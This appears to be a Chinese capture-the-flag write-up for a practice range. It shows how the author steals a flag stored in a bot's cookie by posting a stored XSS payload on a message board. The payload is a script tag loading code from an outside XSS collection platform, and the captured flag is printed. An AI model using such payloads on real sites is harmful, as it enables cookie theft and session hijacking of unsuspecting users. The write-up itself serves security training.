第四章、为了更多的权限!留言板!

第四章 为了更多的权限!留言板!

0x01. 明确目标

https://hack.zkaq.cn/battle/target?id=4f845e5bd308ba0d

image-20210228211828515

重点是这句话 : flag在cookie里,格式为zkz{..},xss bot 每10秒访问一次页面

搜嘎四奈 , 我们只需要在留言板中插入能获取cookie的xss即可 , 但愿没有waf

点击传送门 进入靶场

http://59.63.200.79:8004/Feedback.asp

image-20210228212124227

0x02. 开始留言

这个我们需要一个xss平台 , 但是我那又没有那些时间搭建 , 用的是小窝表哥的xss在线平台 , 功能挺多的 , 推荐

小窝表哥的xss在线平台

https://xss.lstazl.com/login/

payload

<sCrIpT SrC=//xss.lstazl.com/xxx></sCrIpT>

这个是别人不能用的昂 , 因为你就算用了 , 你也登录不了平台看不到cookie

接下来就是把payload填写到留言板中 , 提交

image-20210228212845279

0x03. 获取flag

进入xss后台 , 看到打到的cookie , 从中获取falg

image-20210228213058328

获得flag

flag=zkz{xsser-g00d}
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/xcymn/p/15712476.html